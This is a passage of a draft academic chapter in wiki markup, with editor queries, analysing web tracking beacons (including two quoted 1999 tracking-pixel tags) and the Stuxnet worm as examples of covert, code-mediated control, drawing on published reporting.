They [Eds: what does this 'they' refer to? Can it be clarified?] also enable the assemblage of the new social ontologies and the corresponding social epistemologies that we have increasingly come to take for granted in computational society, including Wikipedia, Facebook, and Twitter. The extent to which computational devices, and the computational principles on which they are based and from which they draw their power, have permeated the way we use and develop knowledges in everyday life is simply breathtaking [Eds: is this not repeating the 'breathtaking' claim of the previous paragraph?], if we had not already discounted and backgrounded its importance. The ability to call up information instantly from a mobile device, combine it with others, subject it to debate and critique through real-time social networks, and then edit, post and distribute it worldwide would be incredible if it hadn’t become so mundane. &lt;br /&gt;
&lt;br /&gt;
Today it should hardly come as a surprise that code/software lies as a mediator between ourselves and our corporeal experiences [Eds: Above the claim was made that code/software are the conditions of possibility of human life. How, then, can they mediate between us and our experiences if they are what makes 'us' possible? Do they constitute us and our world; do they mediate between us and the world; or do they do both? Does all this need clarifying?], disconnecting the physical world from a direct coupling with our physicality, whilst managing a looser softwarized transmission system. Called ‘fly-by-wire’ in aircraft design, in reality fly-by-wire is the condition of the computational environment we increasingly experience, and I elsewhere term ''computationality'' (Berry, 2011). This is a highly mediated existence and has been a growing feature of the (post) modern world. Whilst many objects remain firmly material and within our grasp, it is easy to see how a more softwarized simulacra lies just beyond the horizon. Not that software isn’t material, of course. Certainly, it is embedded in physical objects and the physical environment and requires a material carrier to function at all. Nonetheless, the materiality of software is without a doubt ''differently'' material, more ''tenuously'' material, almost less ''materially material''. [Eds: less material than what? Does this need to be explained?] This is partly, it has to be said, due to software’s increasing tendency to hide its depths behind glass rectangular squares which yield only to certain prescribed forms of touch-based interfaces. Here I am thinking both of physical keyboards and trackpads, as much as haptic touch interfaces, like those found in the iPad and other tablet computers. Another way of putting this, as N. Katherine Hayles (2004) has accurately observed, is that print is flat and code is deep. [Eds: At least one of those contained in your book here, F. Frabetti, creates problems for this idea of Hayles' and its too simplistic understanding of code, print, and materiality. Is this something that should be referenced and commented upon?]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== '''Web Bugs, Beacons, and Trackers'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Some examples will help to demonstrate how this code-based world is increasingly being spun around us. Firstly, we might consider the growing phenomena of what are called ‘web bugs’ (also known as ‘web beacons’); that is, computer programming code that is embedded in seemingly benign surfaces, but which is actively and covertly collecting data and information about us.[1] As Madrigal explains: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;This morning, if you opened your browser and went to NYTimes.com, an amazing thing happened in the milliseconds between your click and when the news about North Korea and James Murdoch appeared on your screen. Data from this single visit was sent to 10 different companies, including Microsoft and Google subsidiaries, a gaggle of traffic-logging sites, and other, smaller ad firms. Nearly instantaneously, these companies can log your visit, place ads tailored for your eyes specifically, and add to the ever-growing online file about you… the list of companies that tracked my movements on the Internet in one recent 36-hour period of standard web surfing: Acerno. Adara Media. Adblade. Adbrite. ADC Onion. Adchemy. ADiFY. AdMeld. Adtech. Aggregate Knowledge. AlmondNet. Aperture. AppNexus. Atlas. Audience Science… And that's just the As. My complete list includes 105 companies, and there are dozens more than that in existence. (Madrigal, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Web bugs are automated data collection agents that are secretly included in the web pages that we browse. Often held within a tiny one-pixel frame or image, which is therefore far too small for the naked eye to see, they execute code to secrete cookies onto your computer so that they can track user behavior, but also [Eds: use 'and' instead of 'but also' as these acts are not that different?] send various information about the user back to their servers. &lt;br /&gt;
&lt;br /&gt;
Originally designed as ‘HTTP state management mechanisms’ in the early 1990s, these data storage processes were designed to enable webpages and sites to store the current collection of data about a user, or what is called ‘State’ in computer science. Known as ‘web bugs for web 1.0’ (Dobias, 2010: 245), they were aimed at allowing website designers to implement some element of memory about a user, such as a current shopping basket, preferences, or username. It was a small step for companies to see the potential of monitoring user behaviour by leaving tracking information about browsing, purchasing and clicking behaviour through the use of these early ‘cookies’.[2] The ability of algorithms to track behaviour, and collect data and information about users raises important privacy implications, but it also facilitates the rise of so-called behaviour marketing and nudges (for a behaviourist approach see Eyal, 2012). These technologies have become much more sophisticated in the light of Web 2.0 technologies and developments in hardware and software: in effect, web bugs for web 2.0 (Dobias, 2010: 245). &lt;br /&gt;
&lt;br /&gt;
Fortunately, we are seeing the creation of a number of useful software projects to allow us to track the trackers: Collusion, Foxtracks and Ghostery, for example.[3] If we look at the Ghostery log for the [http://chartbeat.com/ ChartBeat company] it is described as: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Provid[ing] real-time analytics to web sites and blogs. The interface tracks visitors, load times, and referring sites on a minute-by-minute basis. This allows real-time engagement with users giving publishers an opportunity to respond to social media events as they happen. ChartBeat also supports mobile technology through APIs. (Ghostery, 2012b)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Web bugs perform these analytics by running code run in the browser without the knowledge of the user, which if it should be observed, looks extremely complicated.[4] Here are two early web bugs (web 1.0) collected by the Electronic Frontier Foundation (EFF) (1999): &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;&lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;img src=&amp;quot;(http://ad.doubleclick.net/ad/pixel.quicken/NEW)&amp;quot; width=1 height=1 border=0&amp;amp;gt;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;IMG WIDTH=1 HEIGHT=1 border=0 SRC=&amp;quot;(http://media.preferences.com/ping?&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;ML_SD=IntuitTE_Intuit_1x1_RunOfSite_Any) &amp;amp;amp;db_afcr=4B31-C2FB-10E2C&amp;amp;amp;event=reghome&amp;amp;amp;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;group=register&amp;amp;amp; time=1999.10.27.20.5 6.37&amp;quot;&amp;amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Later web bugs (web 2.0) are not included here due to the complexity and length of the code (but see the 3rd-party elements, or ‘3pes’, at http://www.knowyourelements.com/ ).[5] It is noticeable that this code is extremely opaque and difficult to understand, even for experienced computer programmers. Indeed, one suspects an element of obfuscation, a programming technique to reduce the readability of the code in order to shield the company from observation. So far, in checking a number of web bugs on a variety of websites, I have been unable to find one that supplies any commentary on what exactly the code is doing, beyond a short privacy policy statement. Again Ghostery (2012b) usefully supplies us with some general information on the web bug, such as the fact that it has been found on over 100,000 websites across the Internet, and that the data collected is 'anonymous (browser type), pseudonymous (IP address)', the data is not shared with third parties but no information is given on their data retention policies. As of 2nd March, 2012, Ghostery reported that it was tracking 829 different web bugs across the Internet. This is a relatively unregulated market in user behavior, tracking and data collection, which currently has a number of self-regulatory bodies, such as the Network Advertising Initative (NAI). As Madrigal reports: 'In essence, [the NAI] argued that users do not have the right to *not* be tracked. &amp;quot;We've long recognized that consumers should be provided a choice about whether data about their likely interests can be used to make their ads more relevant,&amp;quot; [they] wrote. &amp;quot;But the NAI code also recognizes that companies sometimes need to continue to collect data for operational reasons that are separate from ad targeting based on a user's online behavior.&amp;quot;… Companies &amp;quot;need to continue to collect data,&amp;quot; but that contrasts directly with users desire &amp;quot;not to be tracked.&amp;quot;' (Madrigal, 2012). [Eds: please check that the single and double quotation marks here are correct]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; These web bugs, beacons, pixels, and tags, as they are variously called, form part of the dark-net surveillance network that users rarely see, even though it is profoundly changing their experience of the internet in real-time by attempting to second guess, tempt, direct and nudge behavior in particular directions. Ghostery ranked the web bugs in 2010 and identified the following as the most frequently encountered (above average): Revenue Science (250x), OpenX (254x), AddThis (523.6x), Facebook Connect (529.8x), Omniture (605.7x), Comscore Beacon (659.5x), DoubleClick (924.4x), QuantCast (1042x), Google Adsense (1452x), Google Analytics (3904.5x) (Ghostery, 2011). As can be seen in terms of relative size of encounter, Google is clearly the biggest player by a long distance in the area of user statistics collection. This data is important because, as JP Morgan's Imran Khan explained, a unique visitor to each website at [http://www.businessinsider.com/blackboard/amazon Amazon] (e-commerce) is generating $189 per user, at [http://www.businessinsider.com/blackboard/google Google] (search) it is generating $24 per user, and although Facebook (social networking) is only generating $4 per user, this is a rapidly growing number (Yarrow, 2011).&amp;amp;nbsp; Keeping and holding these visitors, through real-time analytics, customer history, behavioural targeting, etc. is increasingly becomong extremely profitable. Ghostery (2010) has performed a useful analysis of their web bug database that attempts to categorise the web bugs found into 16 different types, which I have re-categorised into five main types: (1) Advertiser/Marketing Services, (2) Analysis/Research Services, (3) Management Platforms, (4) Verification/Privacy Services: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
1. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Advertiser/Marketing Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Advertiser: A company sponsoring advertisement and ultimately responsible for the message delivered to the consumer. Example: [http://www.att.com/ AT&amp;amp;amp;T] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Exchange: A provider of marketplace connecting advertisers to ad networks and data aggregators (online and off), often facilitating multiple connections and bidding processes. Example: [http://www.rightmedia.com/ Right Media]&amp;amp;nbsp; &amp;amp;nbsp; &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Network: A broker and often technology provider connecting advertisers and publishers. (web site operators) Example: [http://www.burstmedia.com/ Burst Media]&amp;lt;br&amp;gt; &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Publisher: Website operator who displays ads for advertiser(s) in various types of campaigns. Example: [http://www.nytimes.com/ The New York Times]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
2. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Analysis/Research Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Data Aggregator: Collects data from online publishers and provides it to advertisers either directly or via exchange. Example: [http://www.bluekai.com/ BlueKai] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Offline Data Aggregator: Collects data from a range of offline sources and provides data to advertisers directly or via exchange. [http://www.experian.com/ Experian] &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Optimizer: Provider of analytics technology and services for ROI assessment and content optimization purposes. Example: [http://www.roilabs.com/ ROILabs] &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Research: Collects data for market research purposes where no ads are serviced through this data. Example: Example: [http://www.safecount.net/ Safecount] &lt;br /&gt;
*e.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Analytics Provider: Provider of cross-platform statistical analysis to understand market effectiveness and audience segmentation. Example: [http://www.google.com/analytics/ Google Analytics] &lt;br /&gt;
*f.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Retargeter: Providers of technologies that allow publishers to identify their visitor when they place ads on third party sites. Example: [http://www.fetchback.com/ Fetchback]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
3. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Management Platforms''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Demand-Side Platform: A technology provider that allows marketers to buy inventory across multiple platforms or exchanges. DSPs often layer in custom optimization, audience targeting, real-time bidding and other services. Example: [http://www.invitemedia.com/ Invite Media]&amp;lt;br&amp;gt; &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Supply-Side Platform: A technology provider that allows publishers to access advertiser demand across multiple platforms or exchanges.&amp;amp;nbsp; SSPs often layer in custom yield optimization, audience creation, real-time bidding and other services. Example: [http://www.admeld.com/ AdMeld]&amp;lt;br&amp;gt; &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Server: Technology that delivers and tracks advertisements independently of the web site where the ad is being displayed. Example: [http://www.doubleclick.com/ DoubleClick DART]&amp;lt;br&amp;gt; &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Agency: Provider of creative and buying services (both audience and data) for advertisers. Example: [http://www.mediacom.com/en/home.aspx MediaCom]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
4. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Verification/Privacy Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Verification: Certifies or classifies webpages in an effort to prevent advertisers’ campaigns from running on unsavory or blocked content, and/or protects advertisers from having other companies run their ads incorrectly. &amp;amp;nbsp;Example: [http://www.clickforensics.com/ ClickForensics] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Privacy: Technology providers that deliver information and transparency to consumers on how 3rd party companies gather and use their data. Example: [http://www.betteradvertising.com/ Better Advertising]&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &amp;lt;br&amp;gt; [[Image:LUMAadvertising.jpg|left|500x450px|Image 1: Display Advertising Technology Landscape (Luma, 2010)]] &amp;lt;br&amp;gt; ''Image 1: Display Advertising Technology Landscape (Luma, 2010)''&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &amp;lt;br&amp;gt; Ghostery gives a useful explanation of how these companies interoperate to perform a variety of services for advertising and marketing clients: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;A company like [http://www.turn.com/ Turn Media] is a technology provider that allows marketers to buy inventory across multiple platforms or exchanges, or a Demand-Side Platform. They provide services for marketers and agencies to centrally manage buying, planning, targeting, and optimizing media opportunities. Reasonably speaking, however, you could also technically classify them as an Optimizer because this process is included under the umbrella of the platform. Turn [Media] is deeply data driven and partners with multiple data providers including [http://www.bluekai.com/ BlueKai], [http://www.targusinfo.com/ TargusInfo], [http://www.exelate.com/new/index.html eXelate], and others (Ghostery, 2010). &amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Of course, one element missing from this typology is that of surveillance, and indeed it is no surprise that web bugs perform part of the tracking technologies used by companies to monitor staff. For example, in 2006 Hewlett Packard used web bugs from [http://readnotify.com/ readnotify.com] to trace insider leaks to the journalist Dawn Kawamoto and later confirmed in testimony to a U.S. House of Representatives subcommittee that it's ‘still company practice to use e-mail bugs in certain cases’ (Evers, 2006; Fried, 2006). &lt;br /&gt;
&lt;br /&gt;
As can be seen, this is an extremely textured environment that currently offers little in terms of diagnosis or even warnings to the user. The industry itself, which prefers the term “clear GIF” to web bug, is certainly keen to avoid regulation and keeps itself very much to itself in order to avoid raising too much unwarranted attention. Some of the current discussions over the direction of regulation on this issue have focused on the “do not track” flag, which would signal a user's opt-out preference within an HTTP header. Unfortunately, very few companies respect the &amp;quot;do not track&amp;quot; header and there is currently no legal requirement that they do so in the US, or elsewhere (W3C, 2012). Although one can see in this context the current debate over the EU ePrivacy Directive, where the Article 29 Working Party (A29 WP) has stated that ‘voluntary plans drawn up by Europe's digital advertising industry representatives, the European Advertising Standards Alliance (EASA) and IAB Europe, do not meet the consent and information requirements of the recently revised ePrivacy Directive’ (Baker, 2012). [Eds: would this final point be better in a footnote?]&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
One of the newer, and perhaps indicative directions of travel of these new web bugs under development is called [http://www.persianstat.ir/ PersianStat], which claims to keep 'an eye on 1091622 websites': an Iranian web tracking and data analytics website it shows that this new code ecology is not purely a Western phenomenon. With the greater use of computational networked devices in everyday life, from mobile phones to GPS systems, these forms of tracking systems will only become more invasive and aggressive in collecting data from our everyday life and encounters. Indeed, it is unsurprising to find that Americans, for example, are not comfortable with the growth in use of these tracker technologies. Pew (2012) found, &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;that 73 percent of&amp;amp;nbsp;Americans said they would &amp;quot;not be okay&amp;quot; with&amp;amp;nbsp;being tracked (because it would be an invasion&amp;amp;nbsp;of privacy)… Only 23 percent said they'd be &amp;quot;okay&amp;quot; with&amp;amp;nbsp;tracking (because it would lead to better and&amp;amp;nbsp;more personalized search results)…Despite all those high-percentage objections&amp;amp;nbsp;to the idea of being tracked, less than half of&amp;amp;nbsp;the people surveyed -- 38 percent -- said they&amp;amp;nbsp;knew of ways to control the data collected&amp;amp;nbsp;about them. (Garber, 2012; Pew, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This contradiction between the ability of these computational systems and surfaces to supply a commodity to the user, and the need to raise income through the harvesting of data which is in turn sold to advertisers and marketing companies shows that this is an unstable situation. It also serves to demonstrate the extent&amp;amp;nbsp;to which users are just not aware of the subterranean depths of their computational devices and the ability&amp;amp;nbsp;of these general computing platforms to disconnect the user interface from the actual intentions or functioning of the device, whilst giving the impression to the user that they remain fully in control of the computer. As Garber observes, ‘underground network, surface illusion… How much do we actually want to know about this stuff? Do we truly want to understand the intricacies of data-collection and personalization and all the behind-the-screen work that creates the easy, breezy experience of search ... or would we, on some level, prefer that it remain as magic?’ (Garber, 2012). An issue helpfully illustrated by the next case study of the Stuxnet virus, which shows the extent to which the magic of software can conceal its true function. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Stuxnet'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
This next example is a computer worm called Stuxnet,[6] which experts now believe was aimed at the Iranian uranium-enrichment facility at Natanz, Iran.[7] The Stuxnet worm, a subclass of computer virus, copied itself repeatedly across computer systems until it found the host that met its ‘strike conditions’, that is, the location it was designed to attack, and activated its ‘digital warhead’, which may monitor, damage, or even destroy its target. Its name, ‘Stuxnet,’ is ‘derived from some of the filename/strings in the malware - mrxcls.sys, mrxnet.sys’, the first part, 'stu', comes from the (.stub) file, mrxcls.sys; and the second part, 'xnet', comes from mrxnet.sys (Kruszelnicki, 2011; mmpc2, 2010). Due to the sophistication of the programming involved, this worm is considered to have reached a new level in cyberwarfare. Stuxnet has been called the first 'weaponized' computer virus, and it would have required huge resources, like a test facility to model a nuclear plant, to create and launch it (Cherry, 2010). As Liam O Murchu, an operations manager for Symantec, explained, &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Unlike the millions of worms and viruses that turn up on the Internet every year, this one was not trying to steal passwords, identities or money. Stuxnet appeared to be crawling around the world, computer by computer, looking for some sort of industrial operation that was using a specific piece of equipment, a Siemens S7-300 programmable logic controller. (60 Minutes, 2012b).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;The Stuxnet worm works by undertaking a very complex stealth infection and covers its tracks by recording data from the nuclear processing system which it then plays back to the operators to disguise that it is actually gently causing the centifuges to fail. This is known as a ‘man-in-the-middle attack’ because it fakes industrial process control sensor signals so an infected system does not exhibit abnormal behavior and therefore raise alarm. Again, cleverly, the faults it creates in the plant are likely to occur weeks after the sabotaged effort, and in a targeted way, through the fatiguing of the motors – this looks like a standard failure rather than an attack. Indeed, Iran later confirmed that a number of its centrifuges had been affected by an attack (CBS News, 2010).&amp;amp;nbsp;A ‘senior Iranian intelligence official said an estimated 16,000 computers were infected by the Stuxnet virus’ (Assocated Press, 2012). The Stuxnet worm is also interesting because it has built-in ''sunset code'' that causes the worm to erase itself after 24 June, 2012, and hence hide its tracks. As Zetter explains: &lt;br /&gt;
&amp;lt;blockquote&amp;gt;once the code infects a system, it searches for the presence of two kinds of frequency converters made by the Iranian firm Fararo Paya and the Finnish company Vacon, making it clear that the code has a precise target in its sights… Stuxnet begins with a nominal frequency of 1,064 Hz… then reduces the frequency for a short while before returning it back to 1,064 Hz… Stuxnet [then] instructs the speed to increase to 1,410 Hz, which is “very close to the maximum speed the spinning aluminum IR-1 rotor can withstand mechanically,”… [but] before the rotor reaches the tangential speed at which it would break apart… within 15 minutes after instructing the frequency to increase, Stuxnet returns the frequency to its nominal 1,064 Hz level. Nothing else happens for 27 days, at which point a second attack sequence kicks in that reduces the frequency to 2 Hz, which lasts for 50 minutes before the frequency is restored to 1,064 Hz. Another 27 days pass, and the first attack sequence launches again, increasing the frequency to 1,410 Hz, followed 27 days later by a reduction to 2 Hz. (Zetter, 2011)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Stuxnet disguises all of this activity by overriding the data control systems and sending commands to disable warning and safety controls that would normally alert plant operators to these dangerous frequency changes. Stuxnet is interesting because it is not a general purpose attack, but designed to unload its digital warheads under specific conditions against a specific threat target. It is also remarkable in the way in which it disengages the interface, the screen for the user, from the underlying logic and performance of the machine. &lt;br /&gt;
&lt;br /&gt;
Indeed, there has been a great deal of speculation about whether a state would have been required to develop it due to the complexities involved in being able to test such a worm before releasing it into the wild (Markoff and Sanger, 2010). Richard Clarke, the former chief of counter-terrorism under Presidents Clinton and Bush, argues that the built-in fail-safes are an important clue to Stuxnet’s source and that they point to the kinds of procedures found in a Western government. He says, ‘If a [Western] government were going to do something like this…then it would have to go through a bureaucracy, a clearance process, [and] somewhere along the line, lawyers would say, “We have to prevent collateral damage,” and the programmers would go back and add features that normally you don’t see in the hacks. And there are several of them in Stuxnet’ (Gross, 2011). Indeed, the complexities and structure of the worm mean that at least thirty people would have been working on it simultaneously to build such a worm (Zetter, 2010). This is especially true of a worm that launched a so-called ‘zero-day attack’, that is, using a set of techniques that are not public nor known by the developer of the attacked system, in this case Microsoft and Siemens. In actuality it was remarkable for exploiting four different zero-day vulnerabilities (Gross, 2011). Because of the layered approach to its attack and the detailed knowledge required of Microsoft Windows, SCADA (Supervisory Control And Data Acquisition) and PLCs (Programmable Logic Controllers) systems, this would have been a very large project to develop and launch. Indeed, Eric Byres, chief technology officer for Byres Security, has stated: ‘we’re talking man-months, if not years, of coding to make it work the way it did' (quoted in Zetter, 2010). &lt;br /&gt;
&lt;br /&gt;
The two chief capabilities of Stuxnet are: (1) to identify its target precisely using a number of software based markers that give the physical identity of the location away. Indeed, ‘attackers [had] full, and I mean this literally, full tactical knowledge of every damn detail of [the Natanz] plant’ (60 Minutes, 2012b) and (2) the capability to disengage control systems from physical systems and to provide a stealth infection into the computer system that would fool the operators of the plant (also known as a ‘man-in-the-middle attack’). This was achieved through the use of two ‘digital warheads’, called 417 and 315. The smaller, (315), was designed to slowly reduce the speed of rotors leading to cracks and failures, and the second larger warhead, (417), manipulated valves in the centrifuge and faking industrial process control sensor signals by modeling the centifuges which were grouped into 164 cascades (Langner, 2011). Indeed, Langner (2011) described this evocatively as ‘two shooters from different angles’. The Stuxnet worm was launched some time in 2009/2010 and shortly afterwards,[8] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;the all-important centrifuges at Iran's nuclear fuel enrichment facility at Natanz began failing at a suspicious rate. Iran eventually admitted that computer code created problems for their centrifuges, but downplayed any lasting damage. Computer security experts now agree that code was a sophisticated computer worm dubbed Stuxnet, and that it destroyed more than 1,000 centrifuges. (60 Minutes, 2012a)&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; The name Stuxnet origin is hypothesized from an analysis of the approximately 15,000 lines of programming code. This was a close reading and reconstruction of the programming logic by taking the machine code, disassembling it and then attempting to convert it into the C programming language. The code could then be analysed for system function calls, timers, and data structures, in order to try to understand what the code was doing (Langner, 2011). Indeed, as part of this process a reference to “Myrtus” was discovered, and the link made to 'Myrtus as an allusion to the Hebrew word for Esther. The Book of Esther tells the story of a Persian plot against the Jews, who attacked their enemies pre-emptively' (Markoff and Sanger, 2010).[9] Whilst no actor has claimed responsibility for Stuxnet, there is a strong suspicion that either the United States or Israel had to be involved in the creation of such a sophisticated attack virus. Its attack appears to have been concentrated on a number of selected areas, with Iran at the centre (see table 1).&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &amp;lt;br&amp;gt; [[Image:BerryStuxnet.jpg|left|500x450px|Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.)]] &lt;br /&gt;
&lt;br /&gt;
**Iran -&amp;amp;nbsp;52.2% &lt;br /&gt;
**Indonesia -&amp;amp;nbsp;17.4% &lt;br /&gt;
**India -&amp;amp;nbsp;11.3% &lt;br /&gt;
**Pakistan -&amp;amp;nbsp;3.6% &lt;br /&gt;
**Uzbekistan-&amp;amp;nbsp;2.6% &lt;br /&gt;
**Russia -&amp;amp;nbsp;2.1% &lt;br /&gt;
**Kazakhstan -&amp;amp;nbsp;1.3% &lt;br /&gt;
**Rest of World -&amp;amp;nbsp;9.4%&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
''Table 1: Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.).'' &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;Clearly, this kind of attack could be mobilized at targets other than nuclear enrichment facilities, and indeed the stealth and care with which it attempts to fool the operators of the plants shows that computational devices will undoubtedly be targets for monitoring, surveillance, control and so forth in the future. But of course, once the code for undertaking this kind of sophisticated cyberattack is out in the wild it is relatively trivial to decode the computer code and learn techniques that would have taken many years of development in a very short time. As Sean McGurk explains, ‘you can download the actual source code of Stuxnet now and you can repurpose it and repackage it and then, you know, point it back towards wherever it came from’ (60 Minutes, 2012b). Indeed, a different worm, called Duqu, has already been discovered, albeit with purposes linked to the collection of the data on industrial control systems and structures, a so-called ‘Trojan’ (Hopkins, 2011).[10] As Alexander Gostev reports, &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;There were a number of projects involving programs based on the “Tilded” [i.e. Stuxnet] platform throughout the period 2007-2011. Stuxnet and Duqu are two of them – there could have been others, which for now remain unknown. The platform continues to develop, which can only mean one thing – we’re likely to see more modifications in the future. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; The increased ability of software and code via computational devices to covertly monitor, control and mediate, both positively and negatively, is not just a case of interventions for deceiving the human and non-human actors that make up part of these assemblages. In the next section I want to look at the willing compliance with data collection, indeed the enthusiastic contribution of real-time data to computational systems as part of the notion of lifestreams, and more particularly the quantified self movement. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Lifestreams'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
